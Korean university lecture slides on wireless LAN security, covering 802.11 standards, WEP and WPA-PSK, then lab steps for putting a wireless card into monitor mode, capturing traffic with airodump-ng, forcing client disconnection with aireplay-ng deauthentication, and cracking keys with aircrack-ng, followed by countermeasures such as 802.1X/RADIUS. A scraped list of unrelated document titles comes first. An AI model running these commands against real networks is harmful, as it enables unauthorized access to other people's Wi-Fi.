정보보안 개론과 실습:네트워크

Similar documents
1. WLAN - IEEE MAC - WLAN 카드 Mode - MAC Frame Type 과무선네트워크연결과정 2. WEP - WEP 란? 3. WEP Crack 4. WPA - IEEE 802.1x - WPA 5. WPA Crack 6. 대

1,000 AP 20,000 ZoneDirector IT 5, WLAN. ZoneFlex AP ZoneDirector. WLAN. WLAN AP,,,,,,., Wi-Fi. AP. PSK PC. VLAN WLAN.. ZoneDirector 5000 WLAN L

차 례 설치순서 1 인터넷 유무선공유 설치하기 2 스마트에어컨 회원등록 6 캐리어에어컨 스마트앱 사용하기 8

개요

untitled

LOTTE IT FORUM 2008

< FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

Microsoft Word - ZIO-AP1500N-Manual.doc

7782 WI-FI AP (5GHz/2.4GHz) RF 6dB / 15dB 4bB, af/at PoE(Power over Ethernet) 802.3af/at VAC GPS,, 2~4 IP 900Mbps (450Mbps/ ) 32 BSSID, QoS ** Q

TTA Verified : HomeGateway :, : (NEtwork Testing Team)

Security.hwp

1장. 유닉스 시스템 프로그래밍 개요

Windows 8에서 BioStar 1 설치하기

용되어사용되고있다.[2] 무선랜보안기술은무선 AP 에서설정하도록하는기 술로인증과암호화방식에따라 WEP(Wired Equivalent Privacy), WPA(Wi-Fi Protected Access), WPA2(Wi-Fi Protected Access2) 로나뉜다. 각

Copyright 2009 Hewlett-Packard Development Company, L.P. Microsoft 및 Windows 는 Microsoft Corporation 의 미국 등록 상표입니다. Bluetooth 는 해당 소유권자가 소유한 상표이 며 Hew

ipTIME_A2000U_Manual

슬라이드 1

무선통신디바이스관리의필요성

201112_SNUwifi_upgrade.hwp

1. 제품 개요 WeGuardia WIPS V2.0(이하 TOE)은 특정 조직에서 운영되는 무선랜에 대한 지속적인 모니터을 통해 내 외부로부터 발생할 수 있는 각종 침입을 탐지 및 차단하여 내부의 네트워크를 보호하는 무선침입방지시스템이다. TOE의 세부 식별자 및 배포

정보보안 개론과 실습:네트워크

차례 1. 채널 메뉴 채널 정보 보기... 4 채널 메뉴 사용하기... 4 선호 채널 설정하기... 7 채널 기억하기... 7 기타 기능 기본 기능 화면 모드 변경하기... 9 화면 조정값 설정하기... 9 화면 크기 변경하기... 9 부가 설정 변경하기

슬라이드 1

네트워크연결매뉴얼 SRP-Q300/302 감열식프린터 Rev

Copyright 2009 Hewlett-Packard Development Company, L.P. Intel 은 미국 및 다른 국가에서 Intel Corporation 의 상표입니다. Microsoft 및 Windows 는 Microsoft Corporation 의

< 목차 > I. 공유기보안 2 1. 유무선공유기란? 2 2. 공유기보안의필요성 2 3. 공유기환경에서의해킹유형 3 II. 유무선공유기보안관리방법 5 1. 보안항목 5 2. 보안항목별조치방법 5 III. 제조사별공유기보안설정 iptime D-Lin

이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론

운영체제실습_명령어

정보보안 개론과 실습:네트워크

스마트 교육을 위한 학교 유무선 인프라 구축

슬라이드 1

untitled

Microsoft Word - wlan- ipTIME G054U 사용자 설명서_0602_.doc

슬라이드 1

Microsoft PowerPoint - wireless communications.ppt

無線網路技術應用於802

시스코 무선랜 설치운영 매뉴얼(AP1200s_v1.1)

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com

<4D F736F F F696E74202D FB9ABBCB1B7A3B0FA E313120C7C1B7CEC5E4C4DD205BC8A3C8AF20B8F0B5E55D>

11월 16일자.hwp

슬라이드 1

슬라이드 1

PowerPoint 프레젠테이션

untitled

Microsoft Word - eClipse_사용자가이드_

제 2 장제품구성 설치를시작하기전에, 아래의내용물이모두들어있는지확인하십시오. NEXT-201N MINI 무선랜카드 1 설치 CD 1 설치설명서 1 예고없이외관및사양그리고내용물이변경될수있습니다. 시스템요구사항. 펜티엄4급이상.RAM 1GB이상을권장. 최소한개이상의 USB

목차 채널 메뉴 채널 정보 보기 1 채널 메뉴 사용하기 2 선호 채널 설정하기 17 채널 기억하기 19 기타 기능 22 기본 기능 화면 모드 변경하기 23 화면 조정값 설정하기 25 화면 크기 변경하기 27 부가 설정 변경하기 32 TV를 PC 모니터로 사용하기 45

Microsoft PowerPoint 통신과 통신망.ppt

로봇SW교육원 강의자료

슬라이드 1

PowerPoint 프레젠테이션

별지 제10호 서식

SBR-100S User Manual

SBR-100S User Manual

Lecture22

PS4000-¼³¸í¼�

화판_미용성형시술 정보집.0305

SBR-100S User Manual

PowerPoint 프레젠테이션

무선 설치 설명서

온라인등록용 메뉴얼

네트워크연결설명서 SRP-383 감열식영수프린터 Ver

목 차 1. 개요 1 2. 규격의구성및범위 1 3. 관련표준및규격 국외표준및규격 국내표준및규격 기타 2 4. 정의 전자서명법용어정의 용어의정의 용어의효력 2 5. 약어 3 6. 사용자인증 3 7. 전송채널

목차 Q-1. 데이터를 통한 음성통화가 되지 않습니다 Q-2. WiFi 연결이 안됩니다 Q-3. 인터넷 또는 네트워크 연결이 안됩니다 Q-4. 표준 부속품을 알려주시기 바랍니다 Q-5. 구입하였습니다만, 배터리는 어떻게 장착하

Microsoft PowerPoint - DW-150M_User+Manual_NEW_흑백_최종본 [호환 모드]

SNU무선랜 인증서비스 변경

FON_이용안내_A4_ _01.pub

<30302DB8F1C2F7BFDC2E687770>

그뿐아니라통합된 QoS 기능은일정수준의음성및비디오품질을유선및무선네트워크에제공해비지니스용 VoIP 와비디오애플리케이션을사용할수있게합니다. Cisco Wireless-N Access Point 는데이터및개인정보를보호하기위해모든무선전송에강력한암호화를사용하는 Wi-Fi Pro

< C0FCC6C4BBEABEF7B5BFC7E E687770>

Raspbian 설치 라즈비안 OS (Raspbian OS) 라즈베리파이 3 Model B USB 마우스 USB 키보드 마이크로 SD 카드 마이크로 SD 카드리더기 HDM I 케이블모니터

1아이리포 기술사회 모의고사 참조답안

Introduction to Computer Science

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

고객 카드

0. 들어가기 전

1. 제품 개요 AhnLab Policy Center 4.6 for Windows(이하 TOE)는 관리대상 클라이언트 시스템에 설치된 안랩의 안티바이러스 제품인 V3 제품군에 대해 보안정책 설정 및 모니터링 등의 기능을 제공하여 관리대상 클라이언트 시스템에 설치된 V3

<4D F736F F F696E74202D FB5A5C0CCC5CDC5EBBDC5B0FA20B3D7C6AEBFF6C5A9205BC8A3C8AF20B8F0B5E55D>

정보보안 개론과 실습:네트워크

정보보안 개론과 실습:네트워크

무선 네트워크 보안 기술

SBR-100S User Manual

Windows 네트워크 사용 설명서


untitled

DES ( Data Encryption Standard )

hwp

Microsoft Word - src.doc

FunWiFi 사용자 매뉴얼

I-1. 학내구성원 Windows7 자동설정 윈도우트레이에서무선랜아이콘클릭 무선랜이용목록 (SSID) 중 SNU-1st-time 선택 브라우저실행, 교직원 / 학생 WiFi (SNU MEMBER) 를클릭 노트북용환경설정

Untitled-3

(Microsoft Word - M IP Installer \273\347\277\353\271\375.doc)

<C3D6BDC C0CCBDB4202D20BAB9BBE7BABB2E687770>

한눈에-아세안 내지-1


untitled

COVER.HWP

이슈분석 2000 Vol.1

가볍게읽는-내지-1-2

kbs_thesis.hwp

Transcription:

무선네트워크보안과취약점 영동대학교스마트 IT 학부 : 컴퓨터와해킹 이호준 hjlee@yd.ac.kr

Contents 학습목표 무선네트워크를이해한다. 무선네트워크에해킹공격을실행할수있다. 무선랜에대한보안대책을이해한다. 내용 무선네트워크에대한이해 WEP WPA-PSK 무선랜보안 2/29

무선네트워크에대한이해 무선랜 유선랜에비해통신의한계가분명치않으며, 방향성이없어클라이언트가어느거리, 어느방향에서접속하는지에대한정보를얻을수없음 보급초기에는무선네트워크붐이일어많은회사가사내무선랜을설치했지만무선랜의취약한보안때문에사내네트워크가그대로노출되어무선랜을서둘러다시제거하는해프닝을벌이기도함 컴퓨터통신에서무선랜은 2.4GHz 통신망을이용하며, 표준규약으로 802.11 사용 802.11에는 802.11b, 802.11a, 802.11g, 802.11n 등이있음 초기의속도 11Mbps인 802.11b를사용하는무선랜은점차사라지고, 54Mbps를지원하는 802.11g와100Mbps 이상을지원하는 802.11n으로발전 3/29

무선네트워크에대한이해 주요무선랜프로토콜 4/29

무선네트워크에대한이해 IEEE 802.11 IEEE 802 는컴퓨터통신망의표준화를추진하고있는 IEEE 802 위원회가개발한, 일련의 LAN 접속방법및프로토콜국제표준지칭 11 은무선랜관련표준위원회. IEEE 802.11 위원회는 1990 년 10 월부터무선매체접근제어물리계층규격에대한표준화를 OSI 참조모델에준하여진행중 IEEE 802.11b 802.11 규격을기반으로더욱발전시킨기술 최고전송속도는 11Mbps 지만, 실제로는 CSMA/CA 기술의구현과정에서 6~7Mbps 정도효율을나타내는것으로알려져있음 IEEE 802.11a 5GHz 대역의전파를사용하는규격 OFDM 기술을사용해전송속도를최고 54Mbps 까지지원 5GHz 는 2.4GHz 대역에비해다른통신기기 ( 무선전화기, 블루투스기기등 ) 와의간섭이적고, 더넓은전파대역을사용할수있다는장점이있지만신호의특성상장애물이나도심건물등주변환경의영향을쉽게받고, 2.4GHz 대역에서 54Mbps 속도를지원하는 802.11g 규격이등장하면서현재는널리쓰이지않음 IEEE 802.11g 802.11a 규격과전송속도가같고 2.4GHz 대역전파를사용한다는점만다름 널리사용되는 802.11b 규격과쉽게호환되어현재널리쓰임 5/29

무선네트워크에대한이해 IEEE 802.11n 상용화된전송규격으로 2.4GHz 대역과 5GHz 대역을사용하며최고 300Mbps 까지속도지원 우리나라의경우기술규격내주파수점유대역폭의문제 (2 개의채널점유 ) 로 135~144Mbps 로속도가제한되었으나, 2007 년 10 월 17 일전파연구소의기술기준고시로 300Mbps 까지사용할수있게됨 무선랜의이용과통신범위 무선랜은 Ethernet Like 개념으로, 보통내부네트워크의확장으로이용 무선랜을사용하려면내부의유선네트워크에 AP(Access Point) 장비를설치해야함 6/29

무선네트워크에대한이해 무선랜의전송가능거리 [ 그림 12-2] 무지향성안테나 [ 그림 12-3] 지향성안테나 무지향성안테나는보통봉형태로전파수신에일정한방향성이없어 AP 의위치에상관없이동작. 보통 4 개이상의방향성이있다고말하는것이더정확 지향성은다시수직과수평면에대한것으로나뉘고, 대부분의무지향성안테나는수평면에대한무지향성만지원 7/29

무선네트워크에대한이해 무선랜접속 윈도우 기본제공 [ 무선네트워크연결 ] 에서사용가능한무선랜확인하여접속을원하는무선랜선택 NetStumbler( 넷스텀블러 ) 를사용해무선 AP 검색가능 : AP 의 MAC 주소, SSID, 통신채널 (channel), 신호강도, 노이즈등에관한정보를얻을수있음 8/29

무선네트워크에대한이해 리눅스 kismet( 키스멧 ) 툴을사용 기타 구글맵과함께제공하는 Wigle( 위글 ) 과같은서비스이용 9/29

실습 12-1 무선랜해킹을위한네트워크설정하기 [ 그림 12-7] Atheros 칩셋을사용하는무선랜카드검색 실습환경 공격자시스템 : 리눅스페도라 12 공격대상시스템 : 리눅스페도라 12 필요프로그램 : madwifi-0.9.4.tar.gz (Atheros 칩셋리눅스드라이버 ) 10/29

실습 12-1 무선랜해킹을위한네트워크설정하기 1 무선랜카드확인 iwconfig 11/29

실습 12-1 무선랜해킹을위한네트워크설정하기 2 필요라이브러리설치 2-1 kernel-devel 설치 ➊ yum list kernel-devel* ➋ yum install kernel-devel.i686 2-2 kernel-headers 설치 ➊ yum list kernel-headers*➋ yum install kernel-headers.i686 12/29

실습 12-1 무선랜해킹을위한네트워크설정하기 3 기존무선랜드라이버제거 3-1 ath5k.ko, ath9k.ko, ath.ko로확인된 Atheros 네트워크모듈 ➊ ifconfig wlan0 down ifconfig wlan1 down ➋ modprobe -l *ath* 3-2 ath5k.ko, ath9k.ko, ath.ko 모듈사용금지목록등록 ➊ echo "blacklist ath5k" >> /etc/modprobe.d/blacklist ➋ echo "blacklist ath9k" >> /etc/modprobe.d/blacklist ➌ echo "blacklist ath" >> /etc/modprobe.d/blacklist 13/29

실습 12-1 무선랜해킹을위한네트워크설정하기 4 무선랜해킹용드라이버설치 4-1 madwifi의압축풀어설치 ➊ tar xvf madwifi-0.9.4-current.tar.gz ➋ cd madwifi-0.9.4-current ➌ make ➍ make install 4-2 iwconfig 명령으로무선네트워크인터페이스확인 iwconfig 14/29

실습 12-1 무선랜해킹을위한네트워크설정하기 4-3 스니핑용가상인터페이스생성과 ath1 확인 ➊ wlanconfig ath create wlandev wifi0 wlanmode monitor ➋ iwconfig 15/29

WEP WEP(Wired Equivalent Privacy) 무선랜통신을암호화하기위해 802.11b 프로토콜부터적용 1987 년에만들어진 RC 4 암호화알고리즘을기본으로사용 64/128 비트사용가능. 64 비트는 40 비트, 128 비트는 104 비트 RC 4 키사용 WEP 을이용한암호화세션 암호화과정에서암호화키와함께 24 비트의 IV(Initial Vector) 를사용. 통신과정에서 IV 는랜덤으로생성되어, 암호화키에대한복호화를어렵지만 24 비트의 IV 는통신과정에서 24 비트의짧은길이로인해반복사용되며, 반복사용이 WEP 키의복호화를쉽게함 무선통신에서네트워크패킷에포함된 IV 를충분히수집하여 WEP 키를크랙할경우 1 분이내에도복호화가능 16/29

실습 12-2 WEP 키크랙하기 실습환경 공격자시스템 : 리눅스페도라 12 공격대상시스템 : 윈도우 XP 필요프로그램 : aircrack-ng 17/29

실습 12-2 WEP 키크랙하기 1 실습환경구성 1-1 무선랜공유기에서 WEP 키설정 1-2 클라이언트의 WEP 키설정 18/29

실습 12-2 WEP 키크랙하기 2 실습환경구성 ➊ yum list aircrack* ➋ yum install aircrack-ng.i686 3 무선랜패킷수집 airodump-ng --ivs --channel 1 -w wep ath1 --ivs : 무선랜패킷스니핑시암호화크랙에필요한 IV 만수집한다. --channel 1 : 통신채널은 1 만스니핑한다. -w wep : WEP 키에관한내용을 wep.ivs 파일에저장한다. 19/29

실습 12-2 WEP 키크랙하기 4 WEP 키크랙 4-1 aircrack-ng에서대상네트워크선택 ➊ aircrack-ng wep-01.ivs ➋ 3 선택 4-2 aircrack-ng 에서크랙된 WEP 키확인 20/29

WPA-PSK WPA-PSK(Wi-Fi Protected Access Pre-Shared Key) 802.11i 보안표준중일부분으로 WEP 방식의보안문제점을해결하기위해만들어짐 WEP 처럼 AP 와통신해야할클라이언트에암호화키를기본으로등록해두고있지만암호화키를이용해 128 비트인통신용암호화키를새로생성하고, 이암호화키를 10,000 개패킷마다바꿈 암호화알고리즘으로 TKIP 또는 AES 를사용할수있으며, WEP 보다훨씬더강화된암호화세션을제공 AP 에접속하는사용자마다같은암호화키를사용한다는점이보안상미흡 21/29

실습 12-3 WPA-PSK 키크랙하기 실습환경 공격자시스템 : 리눅스페도라 12 공격대상시스템 : 윈도우 XP 필요프로그램 : aircrack-ng 22/29

실습 12-3 WPA-PSK 키크랙하기 1 실습환경구성 : 무선랜공유기에서 WPA-PSK 키설정 23/29

실습 12-3 WPA-PSK 키크랙하기 2 WPA-PSK 인증패킷수집 2-1 airodump-ng를이용한패킷스니핑 airodump-ng --channel 1 -w wpa-psk ath1 2-2 aireplay-ng 를이용한세션중단공격 aireplay-ng -0 5 -c 00:21:5d:2d:9b:ce -e wishfree ath1-0 5 : 세션을끊는패킷 (DeAuth) 을 5 번보낸다. -c 00:16:6F:35:B4:74 : 공격대상으로확인된클라이언트의 MAC 주소다. 이주소는 airodump 화면에서확인할수있다. -e wishfree : 공격대상AP의 SSID다. 24/29

실습 12-3 WPA-PSK 키크랙하기 3 WPA-PSK 키크랙 3-1 aircrack-ng에서대상네트워크선택 aircrack-ng -w dic wpa-psk-01.cap 3-2 aircrack-ng 에서크랙된 WPA-PSK 키확인 25/29

무선랜보안 무선네트워크의문제점에대한대응책 AP 보호를위해서는전파가건물내부로한정되도록전파출력을조정하고창이나외부에접한벽이아닌건물안쪽중심부, 특히쉽게눈에띄지않는곳에설치 AP 관리계정의패스워드를반드시재설정 AP 의 DHCP 를정지 AP 의접속 MAC 주소필터링 SSID(Service Set Identifier) 와 WEP(Wired Equivalent Privacy) 을설정 802.1X 와 RADIUS 서버를이용해인증 무선네트워크공격은 AP 를찾는것부터시작 무선 AP 를찾으려면무선안테나를구입하거나제작하여버스를타고브라우징 SSID 는 AP 에서브로드캐스팅되며, 대부분의 AP 가자동 IP 주소할당으로작동 26/29

무선랜보안 RADIUS 와 802.1X 를이용한무선랜인증 ➊ 클라이언트는 AP 에접속을요청한다. ➋ AP 는무선랜네트워크에클라이언트가로그인할때까지접속을차단한다. ➌ RADIUS 서버는클라이언트에인증 Challenge 를전송한다. ➍ 클라이언트는 Challenge 에대한응답으로, ID 와패스워드에대한해시값을구해 RADIUS 서버에전송한다. ➎ RADIUS 서버가사용자관리데이터베이스정보를사용해 Challenge의응답에대한해시값을구하여클라이언트의해시값과비교한다. 27/29

무선랜보안 ➏ RADIUS 서버가클라이언트를인증하면이러한과정을역으로수행하여클라이언트가 RADIUS 서버를인증한다. 클라이언트와 RADIUS 의상호인증이이루어진다. ➐ 클라이언트와 RADIUS 서버의상호인증이성공적으로완료되면, 네트워크접근을위한적당한클라이언트의수준을정의하고클라이언트를구별할수있는 WEP 키를각각결정한다. ➑ RADIUS 서버는세션키 (Session-Key) 라고부르는 WEP 키를유선랜에위치한 AP 에전송한다. ➒ AP 는세션키로브로드캐스트키를암호화하여클라이언트에암호화된키를전송한다. ➓ 클라이언트는브로드캐스트된암호화된키를복호화하기위해세션키를사용한다. 11 클라이언트와 AP는 WEP을활성화하며, 세션이성립되어있는시간동안통신에세션과브로드캐스트키를사용한다. 28/29

영동대학교스마트 IT 학부 : 컴퓨터와해킹